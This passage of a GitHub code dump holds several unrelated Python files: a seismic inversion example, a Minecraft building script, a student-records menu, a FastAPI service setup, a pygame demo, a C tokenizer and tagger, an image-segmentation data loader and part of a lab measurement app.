dt, freq):\n 
super().__init__()\n self.model = model\n self.dx = dx\n self.dt = dt\n self.freq = freq\n\n def forward(self, source_amplitudes, source_locations,\n receiver_locations):\n v = self.model()\n return scalar(\n v, self.dx, self.dt,\n source_amplitudes=source_amplitudes,\n source_locations=source_locations,\n receiver_locations=receiver_locations,\n max_vel=2500,\n pml_freq=self.freq,\n time_pad_frac=0.2,\n )\n\n\ndef run_rank(rank, world_size):\n print(f\"Running DDP on rank {rank} / {world_size}.\")\n setup(rank, world_size)\n ny = 2301\n nx = 751\n dx = 4.0\n v_true = torch.from_file('marmousi_vp.bin',\n size=ny*nx).reshape(ny, nx)\n\n # Select portion of model for inversion\n ny = 600\n nx = 250\n v_true = v_true[:ny, :nx]\n\n # Smooth to use as starting model\n v_init = torch.tensor(1/gaussian_filter(1/v_true.numpy(), 40))\n\n n_shots = 115\n\n n_sources_per_shot = 1\n d_source = 20 # 20 * 4m = 80m\n first_source = 10 # 10 * 4m = 40m\n source_depth = 2 # 2 * 4m = 8m\n\n n_receivers_per_shot = 384\n d_receiver = 6 # 6 * 4m = 24m\n first_receiver = 0 # 0 * 4m = 0m\n receiver_depth = 2 # 2 * 4m = 8m\n\n freq = 25\n nt = 750\n dt = 0.004\n peak_time = 1.5 / freq\n\n observed_data = (\n torch.from_file('marmousi_data.bin',\n size=n_shots*n_receivers_per_shot*nt)\n .reshape(n_shots, n_receivers_per_shot, nt)\n )\n\n def taper(x):\n # Taper the ends of traces\n return deepwave.common.cosine_taper_end(x, 100)\n\n # Select portion of data for inversion\n n_shots = 16\n n_receivers_per_shot = 100\n nt = 300\n observed_data = (\n taper(observed_data[:n_shots, :n_receivers_per_shot, :nt])\n )\n\n # source_locations\n source_locations = torch.zeros(n_shots, n_sources_per_shot, 2,\n dtype=torch.long)\n source_locations[..., 1] = source_depth\n source_locations[:, 0, 0] = (torch.arange(n_shots) * d_source +\n first_source)\n\n # receiver_locations\n receiver_locations = torch.zeros(n_shots, n_receivers_per_shot,\n 2, dtype=torch.long)\n receiver_locations[..., 1] = receiver_depth\n receiver_locations[:, :, 0] = (\n (torch.arange(n_receivers_per_shot) * d_receiver +\n first_receiver)\n .repeat(n_shots, 1)\n )\n\n # source_amplitudes\n source_amplitudes = (\n (deepwave.wavelets.ricker(freq, nt, dt, peak_time))\n .repeat(n_shots, n_sources_per_shot, 1)\n )\n\n observed_data = \\\n torch.chunk(observed_data, world_size)[rank].to(rank)\n source_amplitudes = \\\n torch.chunk(source_amplitudes, world_size)[rank].to(rank)\n source_locations = \\\n torch.chunk(source_locations, world_size)[rank].to(rank)\n receiver_locations = \\\n torch.chunk(receiver_locations, world_size)[rank].to(rank)\n\n model = Model(v_init, 1000, 2500)\n prop = Prop(model, dx, dt, freq).to(rank)\n prop = DDP(prop, device_ids=[rank])\n\n # Setup optimiser to perform inversion\n loss_fn = torch.nn.MSELoss()\n\n # Run optimisation/inversion\n n_epochs = 2\n\n for cutoff_freq in [10, 15, 20, 25, 30]:\n sos = butter(6, cutoff_freq, fs=1/dt, output='sos')\n sos = [torch.tensor(sosi).to(observed_data.dtype).to(rank)\n for sosi in sos]\n\n def filt(x):\n return biquad(biquad(biquad(x, *sos[0]), *sos[1]),\n *sos[2])\n observed_data_filt = filt(observed_data)\n optimiser = torch.optim.LBFGS(prop.parameters())\n for epoch in range(n_epochs):\n def closure():\n optimiser.zero_grad()\n out = prop(source_amplitudes, source_locations,\n receiver_locations)\n out_filt = filt(taper(out[-1]))\n loss = 1e6*loss_fn(out_filt, observed_data_filt)\n loss.backward()\n return loss\n\n optimiser.step(closure)\n\n # Plot\n if rank == 0:\n v = model()\n vmin = 
v_true.min()\n vmax = v_true.max()\n _, ax = plt.subplots(3, figsize=(10.5, 10.5), sharex=True,\n sharey=True)\n ax[0].imshow(v_init.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\n ax[0].set_title(\"Initial\")\n ax[1].imshow(v.detach().cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\n ax[1].set_title(\"Out\")\n ax[2].imshow(v_true.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\n ax[2].set_title(\"True\")\n plt.tight_layout()\n plt.savefig('example_distributed_ddp.jpg')\n\n v.detach().cpu().numpy().tofile('marmousi_v_inv.bin')\n cleanup()\n\n\ndef run(world_size):\n\n mp.spawn(run_rank,\n args=(world_size,),\n nprocs=world_size,\n join=True)\n\n\nif __name__ == \"__main__\":\n n_gpus = torch.cuda.device_count()\n run(n_gpus)\n","repo_name":"ar4/deepwave","sub_path":"docs/example_distributed_ddp.py","file_name":"example_distributed_ddp.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"21"} +{"seq_id":"30137830144","text":"import sys\n\nimport mcpi.block\nimport mcpi.minecraft\n\nfrom mcthings.server import Server\nfrom mcthings.world import World\n\nfrom mcthings_extra.stairs_snail import StairsSnail\n\nBUILDER_NAME = \"ElasticExplorer\"\n\nMC_SEVER_HOST = \"localhost\"\nMC_SEVER_PORT = 4711\n\n\ndef main():\n try:\n World.connect(Server(MC_SEVER_HOST, MC_SEVER_PORT))\n\n World.server.postToChat(\"Building stairs\")\n pos = World.server.entity.getTilePos(World.server.getPlayerEntityId(BUILDER_NAME))\n pos.z -= 1\n\n stairs = StairsSnail(pos)\n stairs.sections = 4\n stairs.steps = 2\n stairs.width = 3\n stairs.block = mcpi.block.IRON_BLOCK\n stairs.build()\n\n World.server.entity.setTilePos(World.server.getPlayerEntityId(BUILDER_NAME),\n stairs.end_position)\n\n except mcpi.connection.RequestError:\n print(\"Can't connect to Minecraft server \" + MC_SEVER_HOST)\n\n\nif __name__ == \"__main__\":\n main()\n sys.exit(0)\n","repo_name":"Voxelers/mcthings_extra","sub_path":"tests/stairs_snail.py","file_name":"stairs_snail.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19251486322","text":"import main_menu\r\nimport admission\r\ndef ADM_MENU( ):\r\n while True:\r\n #admission menu:-\r\n print(\"*********************************************************************************\")\r\n print(\"* SCHOOL MANAGEMENT SYSTEM *\")\r\n print(\"*********************************************************************************\")\r\n print(\"**-----------ADMISSION-----------**\")\r\n print(\" 1. Admission details :- \")\r\n print(\" 2. Show Admission Details:- \")\r\n print(\" 3. Update Admission Details :- \")\r\n print(\" 4. Search student record :- \")\r\n print(\" 5. Deletion of Records :- \")\r\n print(\" 6. 
Return :- \")\r\n print(\"---------------------------------------\")\r\n print(\" \")\r\n a=int(input(\"Input your Choice:- \"))\r\n if a==1:\r\n admission.admin_details()\r\n elif a==2:\r\n admission.show_admin_details()\r\n elif a==3:\r\n admission.update_admin_details()\r\n elif a==4:\r\n admission.search_admin_details()\r\n elif a==5:\r\n admission.delete_admin_details()\r\n elif a==6:\r\n return\r\n else:\r\n print(\"EROOR: Invalid choice ,try again...\")\r\n conti=\"Press any key to return to main menu..\"\r\ndef admin_details( ):\r\n try:\r\n import pickle\r\n stu={}\r\n stufile=open(\"stu.dat\",\"wb\")\r\n ans=\"y\"\r\n while ans==\"y\":\r\n admno=int(input(\"Admission no:-\"))\r\n name=input(\"Name\")\r\n clas=int(input(\"Class:-\"))\r\n fn=input(\"Fathers name:-\")\r\n mn=input(\"Mothers name:-\")\r\n dob=input(\"Date of birth:-\")\r\n add=input(\"Address:-\")\r\n mobno=int(input(\"Mobile no. :-\"))\r\n stu[\"Admission no\"]=admno\r\n stu[\"Name\"]=name\r\n stu[\"Class\"]=clas\r\n stu[\"Fathers name\"]=fn\r\n stu[\"Mothers name\"]=mn\r\n stu[\"Date of birth\"]=dob\r\n stu[\"Address\"]=add\r\n stu[\"Mobile number\"]=mobno\r\n pickle.dump(stu,stufile)\r\n ans=input(\"wants to enter more records?(y/n):-\")\r\n stufile.close()\r\n except:\r\n print(\"ERROR\")\r\ndef show_admin_details( ):\r\n import pickle\r\n emp={}\r\n empfile=open(\"stu.dat\",\"rb\")\r\n try:\r\n while True:\r\n emp=pickle.load(empfile)\r\n print(emp)\r\n except:\r\n empfile.close()\r\ndef update_admin_details( ):\r\n import pickle\r\n stu={}\r\n f=False\r\n upd=open(\"stu.dat\",\"rb+\")\r\n try:\r\n while True:\r\n r=upd.tell()\r\n stu=pickle.load(upd)\r\n y=int(input(\"admisssion no\"))\r\n z=input(\"name\")\r\n za=input(\"Class\")\r\n if stu[\"Admission no\"]==y:\r\n stu[\"Name\"]=z\r\n upd.seek(r)\r\n pickle.dump(stu,upd)\r\n stu[\"Class\"]\r\n upd.seek(r)\r\n pickle.dump(stu,upd)\r\n f=True\r\n except:\r\n if f==False:\r\n print(\"sorry,no matching record file found.\")\r\n else:\r\n print(\"Record successfuly updated\")\r\n upd.close()\r\ndef search_admin_details( ):\r\n import pickle\r\n stu={}\r\n f=False\r\n fin=open(\"stu.dat\",\"rb\")\r\n a=int(input(\"enter admission no.:-\"))\r\n sk=[a]\r\n try:\r\n while True:\r\n stu=pickle.load(fin)\r\n if stu[\"Admission no\"] in sk:\r\n print(stu)\r\n f=True\r\n except:\r\n if f==False:\r\n print(\"No such records found in the file\")\r\n else:\r\n print(\"search successful.\")\r\n fin.close()\r\ndef delete_admin_details( ):\r\n import pickle as p\r\n import os\r\n f=False\r\n f1=open(\"stu.dat\",\"rb\")\r\n f2=open(\"temp.dat\",\"wb\")\r\n adm=int(input(\"enter admission no.\"))\r\n while True:\r\n try:\r\n d=p.load(f1)\r\n if adm==d[\"Admission no\"]:\r\n f=True\r\n else:\r\n p.dump(d,f2)\r\n except:\r\n break\r\n if f==False:\r\n print(\"record not found!!\")\r\n else:\r\n print(\"record found and deleted\")\r\n f1.close()\r\n f2.close()\r\n import pickle\r\n emp={}\r\n empfile=open(\"temp.dat\",\"rb\")\r\n try:\r\n while True:\r\n emp=pickle.load(empfile)\r\n print(emp)\r\n except:\r\n empfile.close()\r\n\r\n \r\n \r\n \r\n","repo_name":"Vivekkmaury/Python-Project2","sub_path":"admission.py","file_name":"admission.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"783737767","text":"from importlib.metadata import metadata, version\n\nfrom fastapi import FastAPI\nfrom safir.dependencies.arq import arq_dependency\nfrom safir.dependencies.db_session import 
db_session_dependency\nfrom safir.dependencies.http_client import http_client_dependency\nfrom safir.logging import configure_logging, configure_uvicorn_logging\nfrom safir.middleware.x_forwarded import XForwardedMiddleware\n\nfrom .config import config\nfrom .routers import campaigns, groups, index, productions, steps\n\n__all__ = [\"app\", \"config\"]\n\n\nconfigure_logging(profile=config.profile, log_level=config.log_level, name=config.logger_name)\nconfigure_uvicorn_logging(config.log_level)\n\n\ntags_metadata = [\n {\n \"name\": \"Productions\",\n \"description\": \"Operations with `production`s. A `production` is a container for `campaign`s. \"\n \"`production`s must be uniquely named.\",\n },\n {\n \"name\": \"Campaigns\",\n \"description\": \"Operations with `campaign`s. A `campaign` consists of several processing `step`s \"\n \"which are run sequentially. A `campaign` also holds configuration such as a URL for a butler repo \"\n \"and a production area. `campaign`s must be uniquely named withing a given `production`.\",\n },\n {\n \"name\": \"Steps\",\n \"description\": \"Operations with `step`s. A `step` consists of several processing `group`s which \"\n \"may be run in parallel. `step`s must be uniquely named within a give `campaign`.\",\n },\n {\n \"name\": \"Groups\",\n \"description\": \"Operations with `groups`. A `group` can be processed in a single `workflow`, \"\n \"but we also need to account for possible failures. `group`s must be uniquely named within a \"\n \"given `step`.\",\n },\n]\n\napp = FastAPI(\n title=\"cm-service\",\n description=metadata(\"lsst-cm-service\")[\"Summary\"],\n version=version(\"lsst-cm-service\"),\n openapi_url=f\"{config.prefix}/openapi.json\",\n openapi_tags=tags_metadata,\n docs_url=f\"{config.prefix}/docs\",\n redoc_url=f\"{config.prefix}/redoc\",\n)\n\"\"\"The main FastAPI application for cm-service.\"\"\"\n\napp.add_middleware(XForwardedMiddleware)\n\napp.include_router(index.router)\napp.include_router(productions.router, prefix=config.prefix)\napp.include_router(campaigns.router, prefix=config.prefix)\napp.include_router(steps.router, prefix=config.prefix)\napp.include_router(groups.router, prefix=config.prefix)\n\n\n@app.on_event(\"startup\")\nasync def startup_event() -> None:\n await db_session_dependency.initialize(config.database_url, config.database_password)\n assert db_session_dependency._engine is not None\n db_session_dependency._engine.echo = config.database_echo\n await arq_dependency.initialize(mode=config.arq_mode, redis_settings=config.arq_redis_settings)\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event() -> None: # pragma: no cover\n await db_session_dependency.aclose()\n await http_client_dependency.aclose()\n","repo_name":"lsst-dm/cm-service","sub_path":"src/lsst/cmservice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30132173167","text":"import pygame\r\nimport random\r\n\r\nWIDTH = 600 #width of our game window\r\nHEIGHT = 480 #height of our game window\r\nFPS = 60\r\n\r\n#Colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nPURPLE = (115, 0, 195)\r\nPINK = (205, 0, 102)\r\nlight_blue = (65, 105, 255)\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.Surface((50,40))\r\n self.image.fill(light_blue)\r\n self.rect = 
self.image.get_rect()\r\n self.rect.center = (WIDTH/2, HEIGHT/2)\r\n def update(self):\r\n self.rect.y += 10\r\n if self.rect.left > WIDTH:\r\n self.rect.right = 0\r\n if self.rect.top > HEIGHT:\r\n self.rect.bottom = 0\r\n\r\n#Initialize and create game window\r\n\r\npygame.init()\r\npygame.mixer.init() #initializes sound\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT)) #create screen\r\npygame.display.set_caption(\"Game\") #give game a name\r\nclock = pygame.time.Clock() #keep track of speed/time\r\n\r\nall_sprites = pygame.sprite.Group()\r\nplayer = Player()\r\nall_sprites.add(player)\r\n\r\n\r\n#Game Loop\r\nrunning = True\r\nwhile running:\r\n clock.tick(FPS) #keep the loop running at the right speed\r\n #Process Inputs (events)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n \r\n #Updates\r\n all_sprites.update()\r\n #Renders (draws)\r\n screen.fill(PURPLE)\r\n all_sprites.draw(screen)\r\n #after drawing everything, flip the display\r\n pygame.display.flip()\r\npygame.quit()\r\n\r\n","repo_name":"BlueCharizards/Oh-look-it-s-a-website2","sub_path":"gamething.py","file_name":"gamething.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19136383909","text":"import os\nimport tempfile\n\nimport pytest\n\nimport api\n\n\n@pytest.fixture\ndef app():\n db_file, db_path = tempfile.mkstemp()\n app = api.create_app({'TESTING': True, 'DATABASE': db_path})\n\n with app.app_context(), open(os.path.join(os.path.dirname(__file__), 'data.sql'), 'rb') as f:\n api.db.init_db()\n with api.db.cursor() as cur:\n cur.executescript(f.read().decode('utf8'))\n\n yield app\n os.close(db_file)\n os.unlink(db_path)\n\n\n@pytest.fixture\ndef client(app):\n return app.test_client()\n","repo_name":"edmonl/texadaprods","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5055237277","text":"import re\nimport tokens as tkn\n\nfrom taggedtoken import TaggedToken\nfrom taggedstatement import TaggedStatement\n\nRULE_ALPHANUM = re.compile(r\"^\\w+$\")\nRULE_DIGIT = re.compile(r\"^\\d+$\")\nRULE_WHITESPACE = re.compile(r\"^\\s+$\")\n\nclass POSTagger:\n\n def _break_apart(self, string):\n \"\"\"\n Splits and returns valid symbol tokens from a string of symbol characters.\n Unknown symbols will be treated as single-character token.\n\n For example, \"++);\" would return [\"++\", \")\", \";\"]\n \"\"\"\n result = []\n while len(string) > 0:\n\n #If the string starts with a sequence of known token, e.g ++, +=, cut as needed.\n #Otherwise treat the first character as a standalone symbol.\n for token in tkn.multichar_symbol:\n if(string.startswith(token)):\n cut_len = len(token)\n break\n else:\n cut_len = 1\n\n next_token, string = string[:cut_len], string[cut_len:]\n result.append(next_token)\n\n return result\n\n def _floatify(self, tokens):\n \"\"\"\n Merges every [digit, dot, digit] or [digit, dot] token sequence into one floating-point token.\n \"\"\"\n index = 0\n last_check = len(tokens) - 1 #Check until there is at least one remaining tokens.\n result = []\n\n #Check until the last two tokens. 
(Checking further than this will cause index error :) )\n while index < last_check:\n #Merge dots of floating-point numbers (e.g \"3.\", \"4.14\")\n if tokens[index+1] == \".\" and RULE_DIGIT.match(tokens[index]):\n #At this point, there's a number followed by a dot.\n to_join = 2 #Number of token to join\n if (index+2 < len(tokens)) and RULE_DIGIT.match(tokens[index+2]):\n #If the dot is in turn followed by a digit, assume that it's the decimal part of the float\n to_join = 3\n\n result.append(\"\".join(tokens[index:index+to_join]))\n index += to_join\n #Merge dots of library names in include statements.\n elif tokens[0] == \"#\" and tokens[1] == tkn.include_kw and tokens[index+1] == \".\":\n result.append(\"\".join(tokens[index:index+3]))\n index += 3 \n else:\n result.append(tokens[index])\n index += 1\n\n #After the checking is done, append the remaining last three tokens.\n while index < len(tokens):\n result.append(tokens[index])\n index += 1\n\n return result\n\n def _has_dot(self, tokens):\n \"\"\"Returns True for any dot in tokens\"\"\"\n return '.' in tokens\n\n def _has_quote(self, tokens):\n \"\"\"Returns True for any single or double quote in tokens\"\"\"\n return '\"' in tokens or \"'\" in tokens\n\n def _match(self, token):\n \"\"\"Determines the tag of the respective token (according to the token dictionary constants)\"\"\"\n token_dicts = [tkn.arithmetic_operator, tkn.bitwise_operator, tkn.relational_operator, \n tkn.compound_assignment_operator, tkn.logical_operator, tkn.misc_operator, tkn.comments, \n tkn.conditionals, tkn.datatypes, tkn.loops, tkn.special_functions, tkn.keywords]\n\n for token_dict in token_dicts:\n for key, value in token_dict.items():\n if token == value:\n return key\n \n return \"unknown\"\n\n def _measure_string(self, text):\n \"\"\"\n Returns an index in which the first string in the text ends. Returns -1 if no string are ending.\n (The text parameter must start with either single or double quotes)\n \"\"\"\n \n #Do a sanity check; is the text really a string?\n if(not self._starts_with(tkn.string_identifiers, text)):\n print(f\"ERROR! The text ({text}) is not a string, but skip_text() is called on it.\")\n return -1\n\n #What we're looking for is either single or double token; check the first character to determine which.\n cur_string_delimiter = text[0]\n found = False\n idx = -1\n\n #Start from one to account for the first character (the first single/double quote)\n for idx, char in enumerate(text[1:], 1):\n #If the current token is the same as the one starting the string\n #(either single or double quote)\n if char == cur_string_delimiter:\n #If the last character in current string is backslash, it means\n #that the delimiter is escaped; continue.\n if text[idx-1] == \"\\\\\":\n pass\n #else it means that the current string is ending. Break from loop\n else:\n found = True\n break\n \n return idx if found else -1\n\n def _rebuild(self, tokens):\n \"\"\"\n Accepts these as parameter:\n 1. List of tokenized single or multi-line comment.\n 2. List of tokenized statement containing single or double quotes.\n 3. 
List of tokenized statement containing dots.\n\n Returns the same list, but with some parts merged (when needed)\n \"\"\"\n if self._starts_with(tkn.single_comment, tokens):\n return [tokens[0], \"\".join(tokens[1:])] \n elif self._starts_with(tkn.multi_comment, tokens):\n return [tokens[0], \"\".join(tokens[1:-1]), tokens[-1]]\n else:\n #If it's not a comment statement, assume it's a statement containing a string or dots.\n if self._has_quote(tokens): \n tokens = self._stringify(tokens) \n \n if self._has_dot(tokens):\n tokens = self._floatify(tokens)\n\n return tokens\n\n def _split(self, text, preserve_whitespace=False):\n \"\"\"\n Splits a given string into strings of whitespace, alphanumeric, and valid symbol tokens in C.\n If preserve_whitespace is set to True, all whitespaces will be treated as tokens; \n otherwise whitespaces will be skipped.\n \"\"\"\n\n splitter = re.compile(r\"(\\w+|\\s+)\")\n \n result = []\n\n #Filter empty tokens, and loop through it.\n for token in filter(lambda token: len(token) > 0, splitter.split(text)):\n if RULE_WHITESPACE.match(token):\n if preserve_whitespace:\n result.append(token)\n elif RULE_ALPHANUM.match(token):\n result.append(token)\n #it's neither alphanumeric or whitespace, assume it's a symbol string.\n else:\n result.extend(self._break_apart(token))\n\n return result\n\n def _starts_with(self, tokens, statement):\n \"\"\"\n Returns True if the list of A template function to check if a statement (either as a string or a list of string)\n starts with the tokens variable (tokens might be a dict, list, or string)\n \"\"\"\n if isinstance(statement, list):\n start_token = None\n if statement:\n start_token = statement[0]\n return start_token in tokens\n elif isinstance(statement, str):\n return True in (statement.startswith(token) for token in tokens)\n else:\n raise ValueError(\"Statement is neither a list or string object\")\n\n def _stringify(self, tokens):\n \"\"\"\n Merges every tokens between single or double quotes (including the quotes) into one. \n Leave the rest as it is, except that whitespaces outside quotes is removed.\n \n Will handle escaped quotes correctly, but fails silently if there is non-even number of quotes \n (the last quote and all quote afterwards will be dumped)\n \"\"\"\n\n limit = -1\n result_tokens = []\n\n for idx, token in enumerate(tokens):\n #Do nothing if the token is inside of a string's range, OR it's only whitespace.\n if idx < limit or RULE_WHITESPACE.match(token):\n pass\n elif token == \"'\" or token == '\"':\n str_length = self._measure_string(tokens[idx:])\n limit = idx + str_length + 1 #Extra 1 is the offset of single/double quotes\n result_tokens.append(\"\".join(tokens[idx:limit]))\n else:\n result_tokens.append(token)\n \n return result_tokens\n\n def tag(self, statement):\n \"\"\"Tokenizes and tags each token from the statement. 
Returns a TaggedStatement object\"\"\"\n\n id_int = re.compile(r\"^\\d+$\")\n id_float = re.compile(r\"^\\d+\\.(\\d+)?$\")\n id_var = re.compile(r\"^[A-Za-z_][A-Za-z0-9_]*$\")\n id_char = re.compile(r\"^'.*'$\", re.DOTALL)\n id_string = re.compile(r'^\".*\"$', re.DOTALL)\n\n tokens = self.tokenize(statement)\n \n #This only matches known tokens\n matched_tokens = TaggedStatement([TaggedToken(token, self._match(token)) for token in tokens])\n\n #While this match the rest (\"dynamic\" tokens)\n for idx, token in enumerate(matched_tokens):\n if token.tag == \"unknown\":\n token_str = token.token\n #Match library names (stdio.h, conio.h)\n if token_str.lower().endswith(\".h\"):\n token.tag = tkn.tag_name_preproc\n #Match integers (1234, 5454, 5)\n elif id_int.match(token_str):\n token.tag = tkn.tag_val_int\n #Match floating-point (1.1, 3.14, 2.)\n elif id_float.match(token_str):\n token.tag = tkn.tag_val_float\n #Match variable names (x, result, _hero9, y2)\n elif id_var.match(token_str):\n token.tag = tkn.tag_name_var\n #Match characters ('a', 'b')\n elif id_char.match(token_str):\n token.tag = tkn.tag_val_char\n #Match strings (\"abc\", \"def\")\n elif id_string.match(token_str):\n token.tag = tkn.tag_val_string\n\n #Match comment string (comments doesn't have any pattern, match based on position of comment tags)\n if idx == 1:\n prev_token = matched_tokens[0].tag\n if prev_token == tkn.tag_single_comment or prev_token == tkn.tag_multi_comment:\n token.tag = \"comment\"\n \n return matched_tokens\n\n def tokenize(self, statement):\n \"\"\"\n Tokenizes C statement given as parameter into tagging-ready tokens.\n \"\"\"\n\n #If there's quote in the statement, or it's a comment statement, set as True.\n is_ws_sensitive = (self._has_quote(statement) or \n self._starts_with([tkn.single_comment, tkn.multi_comment], statement)) \n tokens = self._split(statement, preserve_whitespace=is_ws_sensitive)\n\n if is_ws_sensitive or self._has_dot(statement):\n tokens = self._rebuild(tokens)\n\n return tokens\n ","repo_name":"ryanfadholi/c2js-rbmt","sub_path":"postagger.py","file_name":"postagger.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44126160951","text":"#!/usr/bin/python\r\nimport os\r\nimport sys\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.data.dataset import Dataset\r\nfrom PIL import Image\r\n\r\n\r\ndef FindErrPots(array):\r\n ashape = array.shape \r\n out2 = []\r\n out0 = []\r\n for i in range(ashape[0]):\r\n for j in range(ashape[1]):\r\n if 2 == array[i][j]:\r\n out2.append([i, j])\r\n #icout2 += 1\r\n elif 0 == array[i][j]:\r\n out0.append([i, j])\r\n #icout0 += 1\r\n return np.array(out0), np.array(out2)\r\n\r\ndef redefPixel2(d_coord, labels):\r\n for i in d_coord:\r\n ic = 0\r\n for j in range(11):\r\n if labels[j,i[0],i[1]] and 0 == ic:\r\n labels[j,i[0],i[1]] = True\r\n ic += 1\r\n else:\r\n labels[j,i[0],i[1]] = False\r\n return labels\r\n\r\ndef redefPixl0(z_coord, labels): #sumlabels\r\n for i in z_coord:\r\n if i[0] < 127 and labels[i[0] + 1][i[1]] != 0:\r\n labels[i[0]][i[1]] = labels[i[0] + 1][i[1]]\r\n else:\r\n if 0 != labels[i[0] - 1][i[1]]:\r\n labels[i[0]][i[1]] = labels[i[0] - 1][i[1]]\r\n else:\r\n labels[i[0]][i[1]] = 1\r\n return labels\r\n\r\ndef loadLabels(ldir, idir):\r\n out = []\r\n for i, it in enumerate(ldir):\r\n img = Image.open(idir + it.strip('\\r\\n'))\r\n img = img.convert('1')\r\n out.append(np.array(img.resize((128, 128))))\r\n return 
np.array(out)\r\n\r\ndef Tomask(ldir, idir):#[11, 16, 16]\r\n #summ = labels.sum(axis = 0)\r\n labels = loadLabels(ldir, idir)\r\n iniSum = labels.sum(axis = 0)\r\n z_coord, a_coord = FindErrPots(iniSum)\r\n #print('------------------------------------',labels.shape)\r\n dst_label = redefPixel2(a_coord, labels)\r\n reSum = dst_label.sum(axis = 0)\r\n \r\n #print(dst_label.shape)\r\n summ = dst_label[1] * 1+ dst_label[2] * 2 + dst_label[3] * 3 + dst_label[4] * 4 + \\\r\n dst_label[5] * 5 + dst_label[6] * 6 + dst_label[7] * 7 + dst_label[8] * 8 + dst_label[9] * 9 + dst_label[10] * 10\r\n dst = redefPixl0(z_coord, summ)\r\n for i in range(len(dst)):\r\n \tfor j in range(len(dst[i])):\r\n \t\tif dst[i][j] > 10:\r\n \t\t\tdst[i][j] = 10\r\n\r\n return np.array(dst)\r\n\r\n\r\nclass dLoader(Dataset):\r\n \"\"\"docstring for dLoader\"\"\"\r\n def __init__(self, img_size, Img_txt_path, Label_dir, Label_img_path, transform = None):\r\n # read imgs path/file_names\r\n self.transform = transform\r\n img_paths = []\r\n with open(Img_txt_path) as ff:\r\n for line in ff:\r\n img_paths.append(line.strip('\\r\\n'))\r\n\r\n #read label imgs\r\n label_txt_path = os.listdir(Label_dir)\r\n full_labels = []\r\n for line in label_txt_path:\r\n with open(Label_dir + line) as ff:\r\n pngs = []\r\n for lab in ff:\r\n pngs.append(lab)\r\n full_labels.append(pngs)\r\n\r\n self.img_filename = img_paths\r\n self.label = full_labels\r\n self.labeli = Label_img_path\r\n self.img_size = img_size\r\n\r\n def __getitem__(self, index):\r\n img = Image.open(self.img_filename[index])\r\n img = img.convert('RGB')\r\n img = img.resize((self.img_size, self.img_size)) \r\n \r\n # Read Labels\r\n mask = np.zeros((self.img_size, self.img_size))\r\n mask = Tomask(self.label[index], self.labeli) \r\n\r\n #with open('{}_.txt'.format(index), 'w') as fw:\r\n # for i in mask:\r\n # for j in i:\r\n # fw.write(str(j) + ' ')\r\n # fw.write('\\n')\r\n # fw.close\r\n\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n mask = torch.from_numpy(mask)\r\n return img, mask# shape of img, labels like: [h, w, c], [h, w, labels]\r\n def __len__(self):\r\n return len(self.img_filename)\r\n\r\n\r\n","repo_name":"chunish/face_parsing_map_segment","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38897559525","text":"import time\n\nfrom common import ComponentBase, Scan, action, TabularMeasurements2M\nfrom common.save import DataSaver\nfrom common.units import Q_\nfrom common.traits import DataSet as DataSetTrait\nfrom dummy import DummyManipulator, DummyContinuousDataSource, DummyLockIn\nfrom pathlib import Path\nfrom traitlets import Instance, Int\nfrom pint import Quantity\nfrom common.units import ureg\nimport thz_context # important for unit conversion\n\n\"\"\"\nExample table measurement with two manipulators\n\"\"\"\n\n\nclass AppRoot(TabularMeasurements2M):\n currentData = DataSetTrait(read_only=True).tag(\n name=\"Time domain\",\n axes_labels=[\"Time\"],\n data_label=\"Amplitude\",\n is_power=False)\n\n dataSaver = Instance(DataSaver)\n\n nMeasurements = Int(1, min=1).tag(name=\"No. 
of measurements\", priority=99)\n\n def __init__(self, objectName=None, loop=None):\n super().__init__(objectName=\"PI tabular measurements\",\n loop=loop)\n\n self.dataSaver = DataSaver(objectName=\"Data Saver\")\n\n pi_stage = DummyManipulator()\n pi_stage.objectName = \"PI C-863 DLine\"\n pi_stage.setPreferredUnits(ureg.ps, ureg.ps / ureg.s)\n\n self.TimeDomainScan = Scan(objectName=\"TimeDomainScan\")\n self.TimeDomainScan.manipulator = pi_stage\n self.TimeDomainScan.dataSource = DummyLockIn()\n self.TimeDomainScan.dataSource.objectName = \"SR830 dummy\"\n\n self.TimeDomainScan.continuousScan = True\n self.TimeDomainScan.minimumValue = Q_(1250, \"ps\")\n self.TimeDomainScan.maximumValue = Q_(1315, \"ps\")\n self.TimeDomainScan.overscan = Q_(3, \"ps\")\n self.TimeDomainScan.step = Q_(0.05, \"ps\")\n self.TimeDomainScan.positioningVelocity = Q_(30, \"ps/s\")\n self.TimeDomainScan.scanVelocity = Q_(1.6, \"ps/s\")\n self.TimeDomainScan.retractAtEnd = True\n\n self.dataSource = 